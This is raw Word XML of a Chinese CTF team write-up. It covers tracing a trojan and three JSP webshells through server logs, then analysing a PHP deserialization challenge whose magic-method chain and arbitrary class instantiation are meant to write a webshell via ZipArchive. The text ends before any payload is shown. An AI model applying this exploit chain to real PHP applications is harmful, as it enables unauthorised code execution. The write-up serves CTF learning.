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A1E8" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>铸剑杯</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSSec08</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>队</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F9ED43" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>可恶的木马竟然伪装成我的朋友</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36101515" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接批量审计日志</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22059621" w14:textId="53A14B7A" w:rsidR="00B85AAD" w:rsidRDefault="004F7831">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DD974F0" wp14:editId="29863D2F">
            <wp:extent cx="5274310" cy="2728595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1429496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6491" name="图片 1429496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3F1D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>grep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检索木马名称得到日期</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2018-2-23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534B0E2E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再去翻阅这一天的日志去找第一条有关这个木马的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016BE1F7" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C1E9B8B" wp14:editId="2D41F8C4">
            <wp:extent cx="5274310" cy="3562985"/>
            <wp:effectExtent l="0" t="0" r="2540" b="18415"/>
            <wp:docPr id="32948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8238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7FBF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>183.62.9.42</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D99304" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>那么就在筛选一下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ip 182.62.9.42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在当天的操作，同时过滤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能的后缀名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E9AA27" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56F145CD" wp14:editId="010FB812">
            <wp:extent cx="5274310" cy="657860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="169415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658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6402" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看根据时间排序得到</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D69982" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="531541E9" wp14:editId="718E6A66">
            <wp:extent cx="5274310" cy="709930"/>
            <wp:effectExtent l="0" t="0" r="2540" b="13970"/>
            <wp:docPr id="196280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0278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08F1" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>table.jsp-en.jsp-2.jsp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，总共三个。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FAA91" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD"/>
    <w:p w14:paraId="72BF4C2C" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>浅析PHP原生类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDA34FA" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612F15CA" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>题目包含两个主要类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6663BE59" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3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install类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8A3F9D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21B7375D" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pP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__wakeup()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: 反序列化时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD3AFA6" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30062402" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76A03D1C" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pP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__toString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: 对象转字符串时触发，关键漏洞点 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($this-&gt;username)()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5559F2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7168A600" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56B54F66" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pP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__destruct()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: 对象销毁时触发，写入配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B3F092" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0620D5D4" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3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Until类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B7CFC0" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA9D943" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pP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__invoke()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: 对象被当作函数调用时触发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31009105" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DC830B3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04013299" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pP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write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>: 动态创建对象并调用open方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFEDCE4" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="186CF158" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞点</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267380A2" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381A7B27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用户可控反序列化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@unserialize($_GET['data'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF358C3" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14A129A1" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05C6B17A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魔术方法调用链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：通过精心构造对象属性形成攻击链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32933A56" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5531C4BD" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71557C25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动态类实例化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Until::write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的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new $cla()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>允许实例化任意类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77889073" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1A731A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击思路</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABE98DF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>攻击链设计</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFB501E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3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r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>需要构造三层对象链：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603D7613" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30E79550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第一层（触发层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：install对象 → 触发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__wakeup()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> → 调用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__toString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F57F2CF" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C0AB363" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31909BAE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第二层（跳转层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：install对象 → 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__toString()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中的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($this-&gt;username)()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> → 触发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__invoke()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B13D54" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118A6E33" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06B2543A" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl/>
      </w:pP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第三层（执行层）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：Until对象 → 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__invoke()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML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write()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0F1115"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> → ZipArchive文件操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0255E34E" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00B85AAD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="90" w:afterAutospacing="1"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FDDD96" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="480" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="default"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用ZipArchive写入Webshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A8A74" w14:textId="77777777" w:rsidR="00B85AAD" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:widowControl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r>
